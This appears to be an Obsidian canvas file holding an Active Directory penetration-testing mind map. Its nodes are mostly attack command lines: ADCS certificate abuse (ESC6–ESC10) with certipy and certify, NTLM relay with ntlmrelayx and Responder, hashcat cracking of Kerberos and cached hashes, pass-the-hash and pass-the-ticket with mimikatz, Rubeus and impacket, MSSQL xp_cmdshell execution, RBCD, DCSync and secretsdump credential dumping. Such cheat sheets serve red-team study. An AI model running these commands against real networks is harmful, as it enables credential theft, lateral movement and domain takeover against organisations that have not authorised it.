{"type":"text","text":"ACL","id":"f60830928f0fdaa1","x":6746,"y":6240,"width":106,"height":60,"color":"#001eff"},
{"type":"text","text":"Misconfigured CA","id":"70717535fc66d6f9","x":6583,"y":6020,"width":182,"height":60},
{"type":"text","text":"ESC6","id":"2d94e5a844d68db9","x":6799,"y":6020,"width":106,"height":60,"color":"#ffdd00"},
{"type":"text","text":"certipy / certify.exe (only the flag ATTRIBUTESUBJECTALTNAME2)","id":"1a6c1ee1b40a8e17","x":5871,"y":6080,"width":630,"height":55},
{"type":"text","text":"```powershell\ncertutil -config \"CA_HOST\\CA_NAME\" -getreg \"policy\\EditFlags\"\n```","id":"af593289bca047ee","x":5873,"y":5960,"width":628,"height":60},
{"type":"text","text":"Abuse the ATTRIBUTESUBJECTALTNAME2 flag set on the CA: you can choose any certificate template that permits client authentication","id":"fcbd1a7d26b6c6ec","x":6994,"y":6022,"width":1017,"height":58},
{"type":"text","text":"ESC7","id":"409715948430912e","x":6799,"y":5439,"width":106,"height":60,"color":"#ffdd00"},
{"type":"text","text":"Write privilege over a certificate template","id":"a6386b40b3adcfb4","x":6959,"y":5279,"width":355,"height":60},
{"type":"text","text":"```bash\ncertipy template -u <user>@<domain> -p '<oassword>' -template <vuln_template> -save-old -debug\n```","id":"c1e7e7554f2b7f56","x":7366,"y":5279,"width":823,"height":60},
{"type":"text","text":"Manage CA","id":"eb3d9510e5b4938c","x":6994,"y":5380,"width":143,"height":60},
{"type":"text","text":"```bash\ncertipy ca -ca <ca_name> -add-officer '<user>'-username <usre>@<domain> -password <password>\n```","id":"092012cddf2a2af7","x":7210,"y":5380,"width":838,"height":60},
{"type":"text","text":"```cmd\ncertify.exe pkiobjects\n```","id":"d10b55b761e91d58","x":5812,"y":6240,"width":250,"height":60},
{"type":"text","text":"ADCS weak configuration","id":"0a2b7bcd6fdf47d3","x":5140,"y":5960,"width":188,"height":60,"color":"#643900"},
{"type":"text","text":"Get CA flags \n(if remote registry is enabled)","id":"1e0170658d7449da","x":5489,"y":6020,"width":291,"height":60},
{"type":"text","text":"```bash\ncertipy find -u <user>@<domain> -p <password> -dc-ip <domaincontroller>\n```","id":"aed3ba23d7f7412e","x":5795,"y":5361,"width":659,"height":60},
{"type":"text","text":"Misconfigured ACL","id":"64a5175f8c36b0c3","x":6501,"y":5361,"width":207,"height":60},
{"type":"text","text":"ESC9/ESC10","id":"641a6cc3b4df27b0","x":5884,"y":6600,"width":178,"height":60,"color":"#ffdd00"},
{"type":"text","text":"Get PKI objects information","id":"18a2cf195c97844c","x":5489,"y":6240,"width":250,"height":60},
{"type":"text","text":"Misconfigured Certificate Mapping\n(blind test)","id":"e46bfcb052d45e18","x":5489,"y":6600,"width":291,"height":60},
{"type":"text","text":"Display CA information","id":"e2b26a865de87a89","x":5489,"y":5635,"width":250,"height":60},
{"type":"text","text":"```cmd\ncertify.exe cas\n```","id":"1c41905c377f0822","x":5871,"y":5695,"width":250,"height":60},
{"type":"text","text":"```cmd\ncertutil -TCAInfo\n```","id":"231484eabfbd4443","x":5871,"y":5575,"width":250,"height":60},
{"type":"text","text":"ESC8","id":"608424fbc7b1960e","x":5808,"y":4644,"width":106,"height":60,"color":"#ffdd00"},
{"type":"text","text":"Web enrollment is up","id":"73e814526eeb722e","x":5489,"y":4644,"width":250,"height":60},
{"type":"text","text":"Get ACL information","id":"d66e53d52074312c","x":5489,"y":5361,"width":250,"height":60},
{"type":"text","text":"```bash\nntlmrelayx.py -t http://<dc_ip>/certsrv/certfnsh.asp -debug -smb2support --adcs --template DomainController\n```","id":"4598488f8e6f862b","x":6024,"y":4554,"width":939,"height":60},
{"type":"text","text":"```bash\ncertipy find -u <user>@<domain> -p <password> -dc-ip <domaincontroller>\n```","id":"75ae932b66e19ffc","x":5828,"y":5028,"width":666,"height":60},
{"type":"text","text":"```bash\nrbcd.py -delegate-from '<rbcd_com>$' -delegate-to '<constrained>$'-dc-ip'<dc>'-action 'write'-hashes '<hash>' <domain>/<constrained>$\n```","id":"ed4f3612aff42b94","x":12437,"y":2822,"width":535,"height":108},
{"type":"text","text":"```cmd\nRubeus s4u /ticket:<ticket> /impersonateuser:<admin_user> /msdsspn:<spn_constrained> /altservice:CIFS /ptt\n```","id":"bd4c80fb39512382","x":12272,"y":2526,"width":636,"height":60},
{"type":"text","text":"With protocol transition (any) \nObject: msDS-AllowedToDelegateTo \nUAC: TRUST_TO_AUTH_FOR_DELEGATION","id":"102303a2b008c623","x":11103,"y":2417,"width":333,"height":104},
{"type":"text","text":"```cmd\nRubeus asktgt /user:<user> /domain:<domain> /aes256:<AES256 hash>\n```","id":"f3762fe69883d58f","x":11571,"y":2526,"width":636,"height":60},
{"type":"text","text":"```cmd\nRubeus hash /password:<password>\n```","id":"bdc9d39f7befb42c","x":11571,"y":2357,"width":636,"height":60},
{"type":"text","text":"```bloodhound\nMATCH (u:User {owned:true}), (c:Computer{name: \"<MYTARGET.FQDN>\"}), p=shortestPath((u)-[*1..]->(c)) RETURN p\n```","id":"d393f78fb3794b82","x":11571,"y":2237,"width":1055,"height":60},
{"type":"text","text":"```bash\nhashcat -m 19700 -a 0 spn.txt rockyou.txt\n```","id":"158b16fd4dd21d5a","x":2915,"y":2226,"width":552,"height":50},
{"type":"text","text":"Kerberos 5 TGS AES256","id":"bd74d584cfd459a0","x":2559,"y":2221,"width":250,"height":60,"color":"2"},
{"type":"text","text":"```bash\nhashcat -m 18200 -a 0 AS-REP_roast_hashes rockyou.txt\n```","id":"6536b70581b33332","x":2915,"y":2319,"width":552,"height":50},
{"type":"text","text":"```bash\nhashcat -m 2100 -a 0 mscache-hash rockyou.txt\n```","id":"524718ecdc2c84c8","x":2915,"y":2412,"width":552,"height":50},
{"type":"text","text":"Kerberos ASREP","id":"1b82ebdd45787434","x":2559,"y":2314,"width":250,"height":60,"color":"2"},
{"type":"text","text":"MsCache 2 (slow)","id":"e6fc699570842d2b","x":2559,"y":2407,"width":250,"height":60,"color":"2"},
{"type":"text","text":"```bash\nsmbclient.py\n```","id":"42b163c28a6085d0","x":768,"y":3065,"width":250,"height":60},
{"type":"text","text":"Possible loot","id":"fc566e1c8a5a13c8","x":1107,"y":2965,"width":139,"height":60,"color":"#ff00dd"},
{"type":"text","text":"User","id":"3d7d2fc5a1b39405","x":1339,"y":3064,"width":250,"height":60,"color":"5"},
{"type":"text","text":"```bash\nresponder -i eth0 --lm\n```","id":"581059a1f1f61cd8","x":768,"y":2964,"width":250,"height":61},
{"type":"text","text":"```bash\nntlmrelayx.py -tf targets.txt -smb2support -socks (-6)\n```","id":"cacdb961592d7028","x":1284,"y":4074,"width":515,"height":50},
{"type":"text","text":"Lateral move (SOCKS)","id":"339a67e60062fb7b","x":1879,"y":4069,"width":250,"height":60,"color":"#7da2de"},
{"type":"text","text":"Find hosts with SMB signing not enforced (default on non-DC)","id":"a04876a5f7c590dc","x":1290,"y":3786,"width":186,"height":60},
{"type":"text","text":"```bash\nntlmrelayx.py -wh <attacker_ip> -t smb://<target> -l /tmp -6 -debug\n```","id":"13e940aff1431c21","x":1290,"y":3974,"width":610,"height":50},
{"type":"text","text":"```metasploit\nuser exploit/windows/smb/smb_relay\n```","id":"e0328d1b132e5b98","x":1589,"y":3786,"width":627,"height":61},
{"type":"text","text":"```bash\ncrackmapexec smb $hosts --gen-relay-list relay.txt\n```","id":"a7bdd20e112b04bf","x":1589,"y":3880,"width":627,"height":61},
{"type":"text","text":"```bash\nntlmrelayx.py -t ldaps://<dc> --remove-mic --add-computer <computer_name> <computer_password> --delegate-access -smb2support\n```","id":"b8be3053620311a8","x":1769,"y":3479,"width":726,"height":80},
{"type":"text","text":"remove mic","id":"ff73b9169ed4e0c7","x":1243,"y":3383,"width":250,"height":60},
{"type":"text","text":"```bash\nntlmrelayx.py -t ldap://<dc> --shadow-credentials --shadow-target '<dc>'\n```","id":"f26a2816c74d0192","x":1769,"y":3597,"width":726,"height":50},
{"type":"text","text":"```bash\nntlmrelayx.py --remove-mic --escalate-user <user> -t ldap://<DC_FQDN> -smb2support\n```","id":"d87d315bcdc9effc","x":1769,"y":3383,"width":726,"height":60},
{"type":"text","text":"MS08-068","id":"21ca6925df7eb5e5","x":1018,"y":3282,"width":124,"height":60,"color":"#7c0404"},
{"type":"text","text":"Relay on itself","id":"99c363bf9382b076","x":810,"y":3282,"width":167,"height":60},
{"type":"text","text":"Shadow credentials","id":"ca02bfdfa2ddd406","x":2744,"y":3592,"width":250,"height":60},
{"type":"text","text":"NetNTLMv1","id":"17dc17895d9c3d97","x":1046,"y":3383,"width":136,"height":60},
{"type":"text","text":"NetNtlmv1","id":"6cd7aae84eb27967","x":1339,"y":2860,"width":250,"height":60,"color":"2"},
{"type":"text","text":"NetNtlmv2","id":"406a3ccd2d14dac8","x":1339,"y":2962,"width":250,"height":60,"color":"2"},
{"type":"text","text":"DcSync","id":"9a82e5248b889eb9","x":2746,"y":3383,"width":250,"height":60,"color":"#8199cf"},
{"type":"text","text":"Admin","id":"5943c3df8de646fd","x":1607,"y":3281,"width":250,"height":60},
{"type":"text","text":"```metasploit\nuse exploit/windows/smb/smb_relay\n```\n//Windows200*","id":"8d4aa0e05ef59ade","x":1182,"y":3256,"width":340,"height":112},
{"type":"text","text":"RBCD","id":"efdac6bac6c5ea1e","x":2746,"y":3489,"width":250,"height":60,"color":"#0fd7a5"},
{"type":"text","text":"Pass the ticket","id":"95bd618abb9ed758","x":12999,"y":-3253,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"High Access","id":"9ec9e6a9c7ac8970","x":12969,"y":-3808,"width":180,"height":60,"color":"1"},
{"type":"text","text":"Low Access","id":"6129004a9b224587","x":12969,"y":-3887,"width":180,"height":60,"color":"#969292"},
{"type":"text","text":"Result / Go to","id":"630345c1e7bbd998","x":12649,"y":-3857,"width":164,"height":60},
{"type":"text","text":"```bash\nadd_computer\n```","id":"b7b8eaa092412f22","x":11950,"y":-1308,"width":181,"height":60},
{"type":"text","text":"```bash\nset_rbcd\n```","id":"716ed10df87cb5c0","x":12200,"y":-1308,"width":181,"height":60},
{"type":"text","text":"Pass the ticket","id":"54acb46b0261ec13","x":12131,"y":-1482,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"RBCD","id":"33f93b101f1f107c","x":12465,"y":-1308,"width":117,"height":60,"color":"#2b9c8f"},
{"type":"text","text":"NTLM hash","id":"ea98e23d713767d7","x":11902,"y":-1695,"width":250,"height":60,"color":"2"},
{"type":"text","text":"Authority/system","id":"e7ac25ce91955f6c","x":11902,"y":-1959,"width":250,"height":60,"color":"1"},
{"type":"text","text":"Search files","id":"a0877cb97a150d02","x":11989,"y":-3603,"width":128,"height":58},
{"type":"text","text":"```bash\nxfreerdp /u:<user> /d:<domain> /pth:<hash> /v:$ip\n```","id":"d12f0de3e4aedd8a","x":11966,"y":-3752,"width":563,"height":58},
{"type":"text","text":"```cmd\nRubeus createnetonly /program:C\\Windows\\System32\\[cmd.exe||upnpcont.exe]\n```","id":"7eb7218a9a366c42","x":11684,"y":-3258,"width":651,"height":60},
{"type":"text","text":"Administrator access","id":"8da6580717cc651e","x":11810,"y":-2427,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"Pass the ticket","id":"ef380ba4a1c0a417","x":12174,"y":-2538,"width":250,"height":50,"color":"#484e7f"},
{"type":"text","text":"DcSync","id":"17b03f163943fb82","x":11657,"y":-2652,"width":250,"height":60,"color":"#8199cf"},
{"type":"text","text":"```cmd\nRubeus ptt /luid:0xdeadbeef /ticket:<ticket>\n```","id":"6fe29748bf4b3d1d","x":12388,"y":-3258,"width":477,"height":60},
{"type":"text","text":"MSSQL","id":"492882ec54988727","x":12065,"y":-3478,"width":105,"height":50,"color":"#484e7f"},
{"type":"text","text":"```cmd\nRubeus ptt /ticket:<ticket>\n```","id":"eb3b22404ca1e177","x":11684,"y":-3355,"width":381,"height":60},
{"type":"text","text":"impacket-tools: Same as Pass the hash but use :-k and -nopass for impacket","id":"abdc48f8337aadac","x":11657,"y":-2919,"width":619,"height":60},
{"type":"text","text":"DcSync","id":"3ff56e997e327054","x":11685,"y":-2337,"width":250,"height":60,"color":"#8199cf"},
{"type":"text","text":"```bash\ngettgtpkinit.py -cert-pfx \"<pfx_file>\" ^[-pfx-pass \"<cert-password>\"] \"<fqdn_domain>/<user>\" \"<tgt_ccache_file>\"\n```","id":"d7ab01ac3060e67c","x":11529,"y":-1618,"width":517,"height":97},
{"type":"text","text":"```cmd\nRubeus.exe asktgt /user:\"<username>\"/certificate:\"<pfx_file>\" [/password:\"<certificate_password>\"] /domain:\"<fqdn_domain>\" /dc\"<dc>\" /show\n```","id":"407c06f09f18b925","x":11529,"y":-1504,"width":517,"height":94},
{"type":"text","text":"```bash\ncertipy auth-pfx <crt_file> -dc-ip <dc_ip><user>@$ip\n```","id":"2e3ad9e99049c407","x":11529,"y":-1392,"width":517,"height":60},
{"type":"text","text":"```bash\nticketConverter.py <kirbi||ccache> <ccache||kirbi>\n```","id":"96b9aba3086029f3","x":11376,"y":-3007,"width":499,"height":60},
{"type":"text","text":"User","id":"2c54bb0fadd6e4f1","x":11685,"y":-2236,"width":111,"height":60,"color":"#31dbdd"},
{"type":"text","text":"```bash\ncertipy auth-pfx <crt_file> -ldap-shell\n```","id":"ff6a5bb8b9108cab","x":11529,"y":-1308,"width":386,"height":60},
{"type":"text","text":"Search files","id":"4dd8311df35b89cb","x":11404,"y":-1827,"width":250,"height":60},
{"type":"text","text":"DcSync","id":"cb90dda974c11055","x":11685,"y":-2072,"width":111,"height":60,"color":"#8199cf"},
{"type":"text","text":"Administrator access","id":"7937685b9739fcbd","x":12335,"y":-2919,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"```cmd\nRubeus asktgt /user:victim /rc4:<rc4value>\n```","id":"ac99c70d52638a63","x":11123,"y":-3295,"width":406,"height":60},
{"type":"text","text":"MSSQL","id":"0963bca236a30e70","x":11061,"y":-3466,"width":123,"height":60},
{"type":"text","text":"```bash\nexec_as_user <user>\n```","id":"166ec0bda836d1a2","x":11748,"y":-6398,"width":251,"height":50},
{"type":"text","text":"```bash\nsp_linkedservers\n```","id":"b84b1569434b0151","x":11691,"y":-6173,"width":205,"height":45},
{"type":"text","text":"coerce SMB","id":"528dcd29b7b2db32","x":11729,"y":-6258,"width":167,"height":50,"color":"3"},
{"type":"text","text":"```bash\nxp_cmdshell <cmd>\n```","id":"a8dfdc39f5bb2fc3","x":11748,"y":-6478,"width":251,"height":50},
{"type":"text","text":"```bash\nsmbclient.py -hashes \":<hash>\" <user>@$ip\n```","id":"8e922df9b8749b53","x":11364,"y":-3603,"width":563,"height":58},
{"type":"text","text":"```bash\ncrackmapexec mssql <ip_range> -u <user> -H ':<hash>'\n```","id":"52c0761c074b946a","x":11364,"y":-3511,"width":602,"height":58},
{"type":"text","text":"```bash\nmssqlclient.py -windows-auth -hashes \":<hash>\" <domain>/<user>@$ip\n```","id":"b75c87cc4a77ef29","x":11364,"y":-3435,"width":602,"height":58},
{"type":"text","text":"MSSQL","id":"d0bdb1d4377400da","x":11685,"y":-2144,"width":111,"height":50,"color":"#484e7f"},
{"type":"text","text":"```bash\ndcomexec.py <domain>/<user>:<password>@$ip\n```","id":"5358fcee7bf8979c","x":11364,"y":-5347,"width":563,"height":58},
{"type":"text","text":"```bash\nsmbexec.py <domain>/<user>:<password>@$ip\n```","id":"193ea2faf40b233a","x":11364,"y":-5503,"width":563,"height":58},
{"type":"text","text":"```bash\nwmiexec.py <domain>/<user>:<password>@$ip\n```","id":"8d8460ac7470dbba","x":11364,"y":-5425,"width":563,"height":58},
{"type":"text","text":"```bash\npsexec.py <domain>/<user>:<password>@$ip\n```","id":"7cbf6152479dc6fc","x":11364,"y":-5886,"width":563,"height":72},
{"type":"text","text":"```powershell\npsexec.exe -AcceptEULA \\\\>ip>\n```","id":"e5d4cbf3d157a95f","x":11364,"y":-5790,"width":563,"height":72},
{"type":"text","text":"```bash\natexec.py <domain>/<user>:<password>@$ip \"command\"\n```","id":"f3ef46c7d016ade0","x":11364,"y":-5581,"width":563,"height":58},
{"type":"text","text":"```cmd\nmimikatz \"privilege::debug sekurlsa::pth /user:>user> /<domain> /ntlm:<hash>\"\n```","id":"bcb3855ba85d4a04","x":11364,"y":-5700,"width":690,"height":60},
{"type":"text","text":"```bash\nevil-winrm -i $ip -u <user> -p <password>\n```","id":"ac2c5b51432e378f","x":11364,"y":-5097,"width":563,"height":58},
{"type":"text","text":"```bash\ncrackmapexec mssql <ip_range> -u <user> -p <password>\n```","id":"0a5b37072094a3bb","x":11364,"y":-4831,"width":563,"height":58},
{"type":"text","text":"```bash\nexec_as_login <login>\n```","id":"d49c8c16403d345c","x":11748,"y":-6326,"width":251,"height":50},
{"type":"text","text":"```bash\nenable_xp_cmdshell\n```","id":"3eefb08d27b76a5c","x":11440,"y":-6478,"width":251,"height":50},
{"type":"text","text":"```bash\ncrackmapexec smb <ip_range> -u <user> -p <password> -local-auth\n```","id":"be912bfc730df341","x":11364,"y":-5187,"width":563,"height":58},
{"type":"text","text":"RDP","id":"316e923e8a6c9c2a","x":11061,"y":-5020,"width":123,"height":60},
{"type":"text","text":"```bash\nxfreerdp /u:<user> /d:<domain> /p:<password> /v:$ip\n```","id":"75a736f4bf6a7148","x":11364,"y":-5020,"width":563,"height":58},
{"type":"text","text":"```bash\nenum_impersonate\n```","id":"cc5d06d02e9ee344","x":11440,"y":-6370,"width":205,"height":45},
{"type":"text","text":"```bash\nxp_dir_tree $ip\n```","id":"1fd7215a0bf144e6","x":11440,"y":-6256,"width":205,"height":45},
{"type":"text","text":"```bash\ntrustlink\n```","id":"586ccd8f5e303a4e","x":11440,"y":-6173,"width":205,"height":45},
{"type":"text","text":"Administrator access","id":"7b8e1e404ae4d0f9","x":11479,"y":-6047,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"WinRM","id":"e20b38bcf45175f2","x":11061,"y":-5099,"width":123,"height":60},
{"type":"text","text":"pseudo-shell (file write and read)","id":"b0291ff57edbfd5e","x":11061,"y":-5425,"width":193,"height":60},
{"type":"text","text":"WinRM","id":"2c6fc3fe98016840","x":11061,"y":-3864,"width":123,"height":60},
{"type":"text","text":"pseudo-shell (file write and read)","id":"cbd2eed747d27abb","x":11061,"y":-4190,"width":193,"height":60},
{"type":"text","text":"```bash\nwmiexec.py -hashes \":<hash>\"<user>@$ip\n```","id":"9f002722a0fc91c4","x":11364,"y":-4190,"width":563,"height":58},
{"type":"text","text":"```bash\ndcomexec.py -hashes \":<hash>\"<user>@$ip\n```","id":"039bf8693f85ff6e","x":11364,"y":-4112,"width":563,"height":58},
{"type":"text","text":"```bash\ncrackmapexec smb <ip_range> -u <user> -d <domain> -h ':<hash>'\n```","id":"353eca740ba9f8ba","x":11364,"y":-4034,"width":563,"height":58},
{"type":"text","text":"```bash\ncrackmapexec smb <ip_range> -u <user> -h ':<hash>' -local-auth\n```","id":"aef234b3e4e1f202","x":11364,"y":-3952,"width":563,"height":58},
{"type":"text","text":"interactive-shell","id":"f8e269243f8245da","x":11061,"y":-4549,"width":193,"height":60},
{"type":"text","text":"```cmd\nmimikatz \"privilege::debug sekurlsa::pth /user:>user> /<domain> /ntlm:<hash>\"\n```","id":"b730413f5a113dca","x":11364,"y":-4465,"width":690,"height":60},
{"type":"text","text":"```bash\nevil-winrm -i $ip -u <user> -H <hash>\n```","id":"d83705f39ba52a57","x":11364,"y":-3862,"width":563,"height":58},
{"type":"text","text":"```bash\nreg.py <domain>/<user>@$ip -hashes ':<hash>' add -keyName 'HKLM\\System\\CurrentControlSet\\Control\\Lsa'-v' DisableRestrictedAdmin'-vt 'REG_DWORD' -vd '0'\n```","id":"9f7677413cbf2861","x":11364,"y":-3778,"width":563,"height":106},
{"type":"text","text":"```bash\nuse_link\n```","id":"729af602d385a93a","x":11964,"y":-6173,"width":135,"height":45},
{"type":"text","text":"Low Access","id":"ff12401a8f924ecf","x":12255,"y":-5099,"width":180,"height":60,"color":"#969292"},
{"type":"text","text":"High Access","id":"06fb69423171c206","x":12255,"y":-5020,"width":180,"height":60,"color":"1"},
{"type":"text","text":"Search files","id":"1a4a3aa0e980b9a6","x":12011,"y":-4923,"width":128,"height":58},
{"type":"text","text":"Authority/system","id":"fd5a6646a0a7098a","x":12197,"y":-4549,"width":250,"height":60,"color":"1"},
{"type":"text","text":"Authority/system","id":"434aa7ffe219d25c","x":12033,"y":-4317,"width":250,"height":60,"color":"1"},
{"type":"text","text":"MSSQL","id":"64d794de16156aa7","x":12067,"y":-6684,"width":105,"height":50,"color":"#484e7f"},
{"type":"text","text":"Low Access","id":"aa275982e9412dba","x":12238,"y":-6815,"width":167,"height":60,"color":"#969292"},
{"type":"text","text":"MSSQL","id":"a1a3656cc5bc4714","x":12071,"y":-6370,"width":105,"height":50,"color":"#484e7f"},
{"type":"text","text":"Low Access","id":"ab12a68c11401142","x":12071,"y":-6483,"width":167,"height":60,"color":"#969292"},
{"type":"text","text":"```bash\nsmbclient.py <domain>/<user>:<password>@$ip\n```","id":"05c6a06a4f5fe27b","x":11364,"y":-4923,"width":563,"height":58},
{"type":"text","text":"SMB","id":"d6b1bd351bdb0db4","x":11061,"y":-4923,"width":123,"height":60},
{"type":"text","text":"MSSQL","id":"0e560d37e7d9103b","x":11061,"y":-4786,"width":123,"height":60},
{"type":"text","text":"MSSQL","id":"3899e6b14509a716","x":12217,"y":-6175,"width":105,"height":50,"color":"#484e7f"},
{"type":"text","text":"Authority/system","id":"3d16b7bdba7a68d1","x":12033,"y":-5552,"width":250,"height":60,"color":"1"},
{"type":"text","text":"Authority/system","id":"1a5f0d2048b9b96d","x":12197,"y":-5784,"width":250,"height":60,"color":"1"},
{"type":"text","text":"MSSQL","id":"faeafe853a8b28c4","x":12011,"y":-4780,"width":105,"height":50,"color":"#484e7f"},
{"type":"text","text":"```bash\nenum_db\n```","id":"fe19e7a6b5dd401b","x":11440,"y":-6562,"width":205,"height":45},
{"type":"text","text":"pseudo-shell (file write and read)","id":"e143f98ccc7c7b26","x":10904,"y":-1943,"width":193,"height":60},
{"type":"text","text":"```bash\nproxychains secretsdump -k-aesKey <key> '<domain>'/'<user>'@$ip\n```","id":"6b9a08e4229982ae","x":11043,"y":-2337,"width":583,"height":60},
{"type":"text","text":"```cmd\nSharpSCCM\n```","id":"76d4e4c46d90ade6","x":10951,"y":-7083,"width":192,"height":60},
{"type":"text","text":"```cmd\nPowerSCCM\n```","id":"d59656e862467cc2","x":10951,"y":-7166,"width":192,"height":60},
{"type":"text","text":"```bash\ntgssub.py -in <ticket.ccache> -out <newticket.ccache> -altservice \"<service>/<target>\"\n```\n//pr 1256","id":"da35865b9fe0b6b1","x":11260,"y":-2564,"width":776,"height":101},
{"type":"text","text":"```cmd\nmimikatz kerberos::ptc \"<ticket>\"\n```","id":"5ae4c03393407acd","x":11043,"y":-2830,"width":583,"height":60},
{"type":"text","text":"Modify SPN","id":"9a3af01cd21c9b28","x":11043,"y":-2543,"width":149,"height":60},
{"type":"text","text":"```cmd\nRubeus.exe ptt /ticket:<ticket>\n```","id":"22baf16a9c655a41","x":11043,"y":-2746,"width":583,"height":60},
{"type":"text","text":"```bash\nproxychains secretsdump -k '<domain>'/'<user>'@$ip\n```","id":"b4ddd2da54652832","x":11043,"y":-2652,"width":583,"height":60},
{"type":"text","text":"```bash\nproxychains smbclient.py -no-pass <user>@$ip\n```","id":"182950b33bf8ffce","x":10905,"y":-1827,"width":445,"height":60},
{"type":"text","text":"Get NTLM hash from certificate","id":"cf57e6ac7bdc8eb8","x":10904,"y":-1695,"width":328,"height":60},
{"type":"text","text":"impacket-tools: Same as Pass the hash but use : -aesKey for impacket and user FQDN","id":"3da12aca7d713df6","x":11043,"y":-2427,"width":664,"height":60},
{"type":"text","text":"```SQL\nEXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE;\n```","id":"fd2d6c3a7895a983","x":11342,"y":-6815,"width":505,"height":60},
{"type":"text","text":"```SQL\nEXECUTE xp_cmdshell '<cmd>'\n```","id":"769aa671fd40f3df","x":11886,"y":-6815,"width":286,"height":60},
{"type":"text","text":"```SQL\nEXECUTE sp_configure 'show advanced options', 1; RECONFIGURE;\n```","id":"2ccaa4426c375582","x":10746,"y":-6815,"width":557,"height":60},
{"type":"text","text":"```bloodhound\nMATCH p=(u:user)-[:SQLAdmin]->(c:Computer) RETURN p\n```","id":"355be0ef365bfded","x":11021,"y":-6905,"width":563,"height":60},
{"type":"text","text":"```bash\ncrackmapexec mssql $ip -u <user> -p <password> -d <domain>\n```","id":"0e06f09db0a348c5","x":11021,"y":-6998,"width":563,"height":60},
{"type":"text","text":"Administrator access","id":"60ef006cd6a2e741","x":11258,"y":-7166,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"Convert format","id":"c8eaa0753244cd04","x":11043,"y":-3007,"width":250,"height":60},
{"type":"text","text":"```bash\ngetTGT.py <domain>/<user> -hashes:<hash>\n```","id":"a2072536c9586fb6","x":11123,"y":-3183,"width":406,"height":60},
{"type":"text","text":"```bash\ngetTGT.py-aesKey '<key>' <domain>/<user>@$ip\n```","id":"0194e595c810c0e8","x":11123,"y":-3100,"width":456,"height":60},
{"type":"text","text":"```bash\nimpacket like cleartext password without domain /\n```","id":"4e9086743b15b67c","x":10779,"y":-5986,"width":563,"height":72},
{"type":"text","text":"Users with SQLadmin","id":"c14986eaa6b56fa9","x":10746,"y":-6905,"width":205,"height":60},
{"type":"text","text":"```bash\ncrackmapexec smb -u <user> -p '<pass>' $ip --local-auth\n```","id":"86de9d718bb06043","x":10779,"y":-6094,"width":563,"height":72},
{"type":"text","text":"Overpass the hash / pass the key (PTK)","id":"ddb0ab1a445c42e1","x":10789,"y":-3218,"width":216,"height":65,"color":"#8e5757"},
{"type":"text","text":"!! Pass the hash (PTH)","id":"25c280082b36cdae","x":10746,"y":-4208,"width":216,"height":50,"color":"#8e5757"},
{"type":"text","text":"Pass the ticket \n(ccache / kirbi)","id":"a595e416716970ac","x":10746,"y":-2746,"width":159,"height":60},
{"type":"text","text":"```powershell\nGet-SQLServerLinkCrawl -username <user> -password <pass> -Verbose -Instance <sql_instance< -Query \"<query>\"\n```","id":"e8f95b6233867d5e","x":11035,"y":-6731,"width":929,"height":60},
{"type":"text","text":"```metasploit\nuse exploit/windows/mssql/mssql_linkcrawler\n```","id":"f3d75d2e1fbe134a","x":11035,"y":-6643,"width":929,"height":60},
{"type":"text","text":"aesKey","id":"fd356f2670bbd9eb","x":10746,"y":-2397,"width":159,"height":60},
{"type":"text","text":"```metasploit\nuse post/windows/gather/credentials/enum_laps\n```","id":"d4918e944ff5f2a1","x":7205,"y":1066,"width":835,"height":50},
{"type":"text","text":"```bloodhound\nMATCH (gr:Group), (gp:GPO), p=((gr)-[:GenericWrite]->(gp)) RETURN p\n```","id":"d35fa121a3040e55","x":7205,"y":1159,"width":628,"height":60},
{"type":"text","text":"On Computer","id":"e5407eac9bc46b10","x":6942,"y":-93,"width":149,"height":50},
{"type":"text","text":"dcsync","id":"495dd10df6c5f6f8","x":6942,"y":-1087,"width":117,"height":60},
{"type":"text","text":"Administrators, Domain Admins, or Enterprise Admins, as well as Domain Controller computer accounts","id":"fd9265c1bcf8dcca","x":7131,"y":-1193,"width":456,"height":66},
{"type":"text","text":"GPO","id":"f9f4e5b1f9af7e93","x":6942,"y":1304,"width":149,"height":66},
{"type":"text","text":"Generic Write on GPO","id":"942c805d41a8e1b2","x":7205,"y":1478,"width":199,"height":50},
{"type":"text","text":"Abuse GPO","id":"1f3a1c988b9baec5","x":7454,"y":1478,"width":123,"height":50},
{"type":"text","text":"Return the principals that can write to the GP-Link attribute on OUs","id":"accf810a1ea99e17","x":7205,"y":1370,"width":372,"height":73},
{"type":"text","text":"```powerview\nGet-DomainObjectAcl -SearchBase \"CN=Policies, CN=System,DC=<BLAH>,DC=com\" - ResolveGUIDs | ? {$_.ObjectAceType -eq \"Group-Policy-Container\"}|select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl\n```","id":"2c0599ef2693c12f","x":7620,"y":1254,"width":835,"height":83},
{"type":"text","text":"SID of principals that can create new GPOs in the domain","id":"dd031fe7b7081fe4","x":7204,"y":1254,"width":373,"height":83},
{"type":"text","text":"```cmd\nsc \\\\DNSServer stop dns\n```","id":"1315ed8e55982c17","x":7852,"y":1653,"width":252,"height":60},
{"type":"text","text":"Impersonate RDP Session","id":"a8eac6e596715999","x":6633,"y":-1904,"width":240,"height":60},
{"type":"text","text":"```powershell\npsexec -s -i cmd\n```","id":"51f7e1f87ef617b0","x":6935,"y":-1904,"width":250,"height":60},
{"type":"text","text":"Hybrid-Environment (Azure AD Connect)","id":"1c1fc232b50fa754","x":6633,"y":-1765,"width":353,"height":60,"color":"#930e93"},
{"type":"text","text":"Dump cleartext password of MSOL Account on AAD Connect server","id":"41bc01bd5628ca29","x":7085,"y":-1765,"width":576,"height":60},
{"type":"text","text":"```powershell\npsexec -s -i cmd\n```","id":"29bf7eb186745c64","x":7248,"y":-1904,"width":250,"height":60},
{"type":"text","text":"ACLs / ACEs\npermissions","id":"a6821170d323adcf","x":6639,"y":332,"width":140,"height":70,"color":"#001eff"},
{"type":"text","text":"Admin","id":"b417564024ee94bf","x":8152,"y":878,"width":250,"height":60,"color":"#ff00ff"},
{"type":"text","text":"Domain Admin","id":"fd67eaeab0da5a6b","x":8317,"y":-1127,"width":146,"height":55,"color":"1"},
{"type":"text","text":"Lateral move","id":"dfff0a7f916aa291","x":8317,"y":-1052,"width":146,"height":50,"color":"#484e7f"},
{"type":"text","text":"Hash found (TGS)","id":"538fb8aed3603db3","x":8353,"y":145,"width":201,"height":50,"color":"2"},
